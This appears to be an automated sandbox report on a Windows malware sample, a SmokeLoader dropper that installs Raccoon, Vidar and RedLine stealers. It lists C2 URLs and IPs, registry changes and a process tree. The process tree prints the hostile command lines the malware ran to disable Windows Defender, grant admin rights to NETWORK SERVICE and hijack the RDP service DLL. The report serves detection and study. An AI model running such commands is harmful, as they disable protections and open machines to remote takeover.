Analysis
-
max time kernel
152s -
max time network
152s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
13-10-2021 13:55
Static task
static1
Behavioral task
behavioral1
Sample
6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
Resource
win10v20210408
General
-
Target
6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe
-
Size
310KB
-
MD5
4e7d2f61317c940dc939ba2ca9393a23
-
SHA1
12f176cf157b5958fb843907d3d44ac464f13d81
-
SHA256
6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb
-
SHA512
8dbd96f861b7e746752e9c2e4eddba9e882b3d18f130ee66574bf244e2e4a1140a4cd034c7b25c04778752b44434c2a2438c0037487c41f50ba361c8774589f0
Malware Config
Extracted
smokeloader
2020
http://honawey7.xyz/
http://wijibui0.xyz/
http://hefahei6.xyz/
http://pipevai4.xyz/
http://nalirou7.xyz/
http://xacokuo8.xyz/
http://hajezey1.xyz/
http://gejajoo7.xyz/
http://sysaheu9.xyz/
http://rixoxeu9.xyz/
Extracted
raccoon
1.8.2
fbe5e97e7d069407605ee9138022aa82166657e6
-
url4cnc
http://telemirror.top/stevuitreen
http://tgmirror.top/stevuitreen
http://telegatt.top/stevuitreen
http://telegka.top/stevuitreen
http://telegin.top/stevuitreen
https://t.me/stevuitreen
Extracted
vidar
41.3
1033
https://mas.to/@oleg98
-
profile_id
1033
Extracted
raccoon
4b9b8980a10a7e59f200af975a29a100ba819fe0
-
url4cnc
http://telemirror.top/ararius809b
http://tgmirror.top/ararius809b
http://telegatt.top/ararius809b
http://telegka.top/ararius809b
http://telegin.top/ararius809b
https://t.me/ararius809b
Extracted
redline
w1
109.234.34.165:12323
Extracted
raccoon
1.8.2
c8fdd015293e99dac71bc0cfc194d3ce612abf3e
-
url4cnc
http://telemirror.top/rocketmanthem2
http://tgmirror.top/rocketmanthem2
http://telegatt.top/rocketmanthem2
http://telegka.top/rocketmanthem2
http://telegin.top/rocketmanthem2
https://t.me/rocketmanthem2
Extracted
raccoon
7ebf9b416b72a203df65383eec899dc689d2c3d7
-
url4cnc
http://telegatt.top/agrybirdsgamerept
http://telegka.top/agrybirdsgamerept
http://telegin.top/agrybirdsgamerept
https://t.me/agrybirdsgamerept
Extracted
redline
huyzalupanew
135.181.208.162:13904
Extracted
redline
@Nastya_ero
45.14.49.66:21899
Extracted
redline
MegaProliv2
93.115.20.139:28978
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 9 IoCs
resource yara_rule behavioral1/memory/528-141-0x0000000000A60000-0x0000000000A91000-memory.dmp family_redline behavioral1/memory/528-146-0x0000000002850000-0x000000000286C000-memory.dmp family_redline behavioral1/memory/1872-199-0x0000000000750000-0x0000000000781000-memory.dmp family_redline behavioral1/memory/1872-205-0x0000000002860000-0x000000000287C000-memory.dmp family_redline behavioral1/memory/1172-244-0x0000000005A30000-0x0000000005A4C000-memory.dmp family_redline behavioral1/memory/1496-250-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/1496-251-0x000000000041B252-mapping.dmp family_redline behavioral1/memory/4456-405-0x000000000041B22A-mapping.dmp family_redline behavioral1/memory/4456-449-0x0000000005700000-0x0000000005D06000-memory.dmp family_redline -
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 3024 created 1872 3024 WerFault.exe 88 PID 3064 created 1716 3064 WerFault.exe 78 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Nirsoft 3 IoCs
resource yara_rule behavioral1/files/0x000100000001ab7e-366.dat Nirsoft behavioral1/files/0x000100000001ab7e-367.dat Nirsoft behavioral1/files/0x000100000001ab7e-371.dat Nirsoft -
Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/1332-132-0x0000000003430000-0x0000000003506000-memory.dmp family_vidar behavioral1/memory/1332-133-0x0000000000400000-0x0000000001735000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 31 IoCs
pid Process 2756 C3C3.exe 1332 C73E.exe 1716 CFBB.exe 528 D3F2.exe 2168 DDB7.exe 3728 E21D.exe 4092 EDF6.exe 604 F4AD.exe 3884 E21D.exe 1872 FCEC.exe 620 E21D.exe 2344 29A.exe 68 bbjggue 700 5E7.exe 1172 897.exe 1496 E21D.exe 1576 2364.exe 4004 bbjggue 712 314F.exe 1768 3A97.exe 1652 sqtvvs.exe 3800 AdvancedRun.exe 4172 AdvancedRun.exe 4456 3A97.exe 4684 NylghausHosen_2021-10-12_23-24 2.exe 4748 Qf5dSHBPGf8J.exe 444 29A.exe 4488 sqtvvs.exe 4188 mine.exe 4108 6666.exe 3236 services32.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
resource yara_rule behavioral1/files/0x000400000001ab50-333.dat vmprotect behavioral1/files/0x000400000001ab50-343.dat vmprotect behavioral1/files/0x000300000001ab7b-354.dat vmprotect -
Deletes itself 1 IoCs
pid Process 1964 Process not Found -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime.exe 2364.exe -
Loads dropped DLL 2 IoCs
pid Process 1332 C73E.exe 1332 C73E.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 3A97.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 3A97.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 3A97.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 3A97.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 3A97.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 3A97.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 3A97.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 3A97.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\3A97.exe = "0" 3A97.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 3A97.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe 1768 3A97.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 516 set thread context of 3396 516 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe 72 PID 3728 set thread context of 1496 3728 E21D.exe 94 PID 68 set thread context of 4004 68 bbjggue 105 PID 1768 set thread context of 4456 1768 3A97.exe 121 PID 2344 set thread context of 444 2344 29A.exe 148 -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 3024 1872 WerFault.exe 88 3064 1716 WerFault.exe 78 -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bbjggue Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bbjggue Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI bbjggue Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C73E.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C73E.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2228 schtasks.exe 4624 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3228 timeout.exe -
Kills process with taskkill 1 IoCs
pid Process 1932 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings 29A.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4116 reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3396 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe 3396 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found 1964 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1964 Process not Found -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 640 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 3396 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe 4004 bbjggue -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeDebugPrivilege 528 D3F2.exe Token: SeDebugPrivilege 1932 taskkill.exe Token: SeRestorePrivilege 3024 WerFault.exe Token: SeBackupPrivilege 3024 WerFault.exe Token: SeDebugPrivilege 3024 WerFault.exe Token: SeDebugPrivilege 1172 897.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeDebugPrivilege 1496 E21D.exe Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeDebugPrivilege 3692 powershell.exe Token: SeDebugPrivilege 1768 3A97.exe Token: SeDebugPrivilege 3800 AdvancedRun.exe Token: SeImpersonatePrivilege 3800 AdvancedRun.exe Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeDebugPrivilege 4172 AdvancedRun.exe Token: SeImpersonatePrivilege 4172 AdvancedRun.exe Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeDebugPrivilege 2344 29A.exe Token: SeDebugPrivilege 4404 powershell.exe Token: SeDebugPrivilege 4456 3A97.exe Token: SeShutdownPrivilege 1964 Process not Found Token: SeCreatePagefilePrivilege 1964 Process not Found Token: SeShutdownPrivilege 1964 Process not Found -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1964 Process not Found 1964 Process not Found -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1964 Process not Found 1964 Process not Found -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 1964 Process not Found -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 516 wrote to memory of 3396 516 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe 72 PID 516 wrote to memory of 3396 516 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe 72 PID 516 wrote to memory of 3396 516 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe 72 PID 516 wrote to memory of 3396 516 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe 72 PID 516 wrote to memory of 3396 516 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe 72 PID 516 wrote to memory of 3396 516 6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe 72 PID 1964 wrote to memory of 2756 1964 Process not Found 76 PID 1964 wrote to memory of 2756 1964 Process not Found 76 PID 1964 wrote to memory of 2756 1964 Process not Found 76 PID 1964 wrote to memory of 1332 1964 Process not Found 77 PID 1964 wrote to memory of 1332 1964 Process not Found 77 PID 1964 wrote to memory of 1332 1964 Process not Found 77 PID 1964 wrote to memory of 1716 1964 Process not Found 78 PID 1964 wrote to memory of 1716 1964 Process not Found 78 PID 1964 wrote to memory of 1716 1964 Process not Found 78 PID 1964 wrote to memory of 528 1964 Process not Found 79 PID 1964 wrote to memory of 528 1964 Process not Found 79 PID 1964 wrote to memory of 528 1964 Process not Found 79 PID 1964 wrote to memory of 2168 1964 Process not Found 81 PID 1964 wrote to memory of 2168 1964 Process not Found 81 PID 1964 wrote to memory of 2168 1964 Process not Found 81 PID 1964 wrote to memory of 3728 1964 Process not Found 82 PID 1964 wrote to memory of 3728 1964 Process not Found 82 PID 1964 wrote to memory of 3728 1964 Process not Found 82 PID 3728 wrote to memory of 3884 3728 E21D.exe 84 PID 3728 wrote to memory of 3884 3728 E21D.exe 84 PID 3728 wrote to memory of 3884 3728 E21D.exe 84 PID 1964 wrote to memory of 4092 1964 Process not Found 85 PID 1964 wrote to memory of 4092 1964 Process not Found 85 PID 1964 wrote to memory of 4092 1964 Process not Found 85 PID 1964 wrote to memory of 604 1964 Process not Found 86 PID 1964 wrote to memory of 604 1964 Process not Found 86 PID 1964 wrote to memory of 604 1964 Process not Found 86 PID 3728 wrote to memory of 620 3728 E21D.exe 87 PID 3728 wrote to memory of 620 3728 E21D.exe 87 PID 3728 wrote to memory of 620 3728 E21D.exe 87 PID 1964 wrote to memory of 1872 1964 Process not Found 88 PID 1964 wrote to memory of 1872 1964 Process not Found 88 PID 1964 wrote to memory of 1872 1964 Process not Found 88 PID 1332 wrote to memory of 3372 1332 C73E.exe 89 PID 1332 wrote to memory of 3372 1332 C73E.exe 89 PID 1332 wrote to memory of 3372 1332 C73E.exe 89 PID 3372 wrote to memory of 1932 3372 cmd.exe 92 PID 3372 wrote to memory of 1932 3372 cmd.exe 92 PID 3372 wrote to memory of 1932 3372 cmd.exe 92 PID 3728 wrote to memory of 1496 3728 E21D.exe 94 PID 3728 wrote to memory of 1496 3728 E21D.exe 94 PID 3728 wrote to memory of 1496 3728 E21D.exe 94 PID 1964 wrote to memory of 2344 1964 Process not Found 95 PID 1964 wrote to memory of 2344 1964 Process not Found 95 PID 3372 wrote to memory of 3228 3372 cmd.exe 96 PID 3372 wrote to memory of 3228 3372 cmd.exe 96 PID 3372 wrote to memory of 3228 3372 cmd.exe 96 PID 1964 wrote to memory of 700 1964 Process not Found 98 PID 1964 wrote to memory of 700 1964 Process not Found 98 PID 2168 wrote to memory of 3268 2168 DDB7.exe 99 PID 2168 wrote to memory of 3268 2168 DDB7.exe 99 PID 2168 wrote to memory of 3268 2168 DDB7.exe 99 PID 1964 wrote to memory of 1172 1964 Process not Found 101 PID 1964 wrote to memory of 1172 1964 Process not Found 101 PID 1964 wrote to memory of 1172 1964 Process not Found 101 PID 3728 wrote to memory of 1496 3728 E21D.exe 94 PID 3728 wrote to memory of 1496 3728 E21D.exe 94 PID 3728 wrote to memory of 1496 3728 E21D.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe"C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe"C:\Users\Admin\AppData\Local\Temp\6cf0baff3d21dd59d2d21e3ac0c3cc581b057a4316af4cb0cc36bb819b1de8eb.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3396
-
-
C:\Users\Admin\AppData\Local\Temp\C3C3.exeC:\Users\Admin\AppData\Local\Temp\C3C3.exe1⤵
- Executes dropped EXE
PID:2756
-
C:\Users\Admin\AppData\Local\Temp\C73E.exeC:\Users\Admin\AppData\Local\Temp\C73E.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:1332 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im C73E.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\C73E.exe" & del C:\ProgramData\*.dll & exit2⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im C73E.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1932
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:3228
-
-
-
C:\Users\Admin\AppData\Local\Temp\CFBB.exeC:\Users\Admin\AppData\Local\Temp\CFBB.exe1⤵
- Executes dropped EXE
PID:1716 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1716 -s 9282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:3064
-
-
C:\Users\Admin\AppData\Local\Temp\D3F2.exeC:\Users\Admin\AppData\Local\Temp\D3F2.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:528
-
C:\Users\Admin\AppData\Local\Temp\DDB7.exeC:\Users\Admin\AppData\Local\Temp\DDB7.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3268 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1j0jo4oh\1j0jo4oh.cmdline"3⤵PID:2800
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES220F.tmp" "c:\Users\Admin\AppData\Local\Temp\1j0jo4oh\CSC445D7A85EDD9432F95C54633D8E6EAD.TMP"4⤵PID:1340
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3692
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:4840
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:4392
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:4116
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2072
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:4092
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:4964
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵PID:4908
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵PID:4864
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:4936
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:5040
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵PID:5076
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵PID:4420
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:4516
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E21D.exeC:\Users\Admin\AppData\Local\Temp\E21D.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3728 -
C:\Users\Admin\AppData\Local\Temp\E21D.exeC:\Users\Admin\AppData\Local\Temp\E21D.exe2⤵
- Executes dropped EXE
PID:3884
-
-
C:\Users\Admin\AppData\Local\Temp\E21D.exeC:\Users\Admin\AppData\Local\Temp\E21D.exe2⤵
- Executes dropped EXE
PID:620
-
-
C:\Users\Admin\AppData\Local\Temp\E21D.exeC:\Users\Admin\AppData\Local\Temp\E21D.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Users\Admin\AppData\Local\Temp\EDF6.exeC:\Users\Admin\AppData\Local\Temp\EDF6.exe1⤵
- Executes dropped EXE
PID:4092
-
C:\Users\Admin\AppData\Local\Temp\F4AD.exeC:\Users\Admin\AppData\Local\Temp\F4AD.exe1⤵
- Executes dropped EXE
PID:604
-
C:\Users\Admin\AppData\Local\Temp\FCEC.exeC:\Users\Admin\AppData\Local\Temp\FCEC.exe1⤵
- Executes dropped EXE
PID:1872 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1872 -s 6722⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:3024
-
-
C:\Users\Admin\AppData\Local\Temp\29A.exeC:\Users\Admin\AppData\Local\Temp\29A.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:2344 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\_Piejpnomdy.vbs"2⤵PID:4732
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionPath C:\,'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google\wslm.exe'3⤵PID:1764
-
-
-
C:\Users\Admin\AppData\Local\Temp\29A.exeC:\Users\Admin\AppData\Local\Temp\29A.exe2⤵
- Executes dropped EXE
PID:444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com3⤵PID:4952
-
-
-
C:\Users\Admin\AppData\Roaming\bbjggueC:\Users\Admin\AppData\Roaming\bbjggue1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:68 -
C:\Users\Admin\AppData\Roaming\bbjggueC:\Users\Admin\AppData\Roaming\bbjggue2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4004
-
-
C:\Users\Admin\AppData\Local\Temp\5E7.exeC:\Users\Admin\AppData\Local\Temp\5E7.exe1⤵
- Executes dropped EXE
PID:700 -
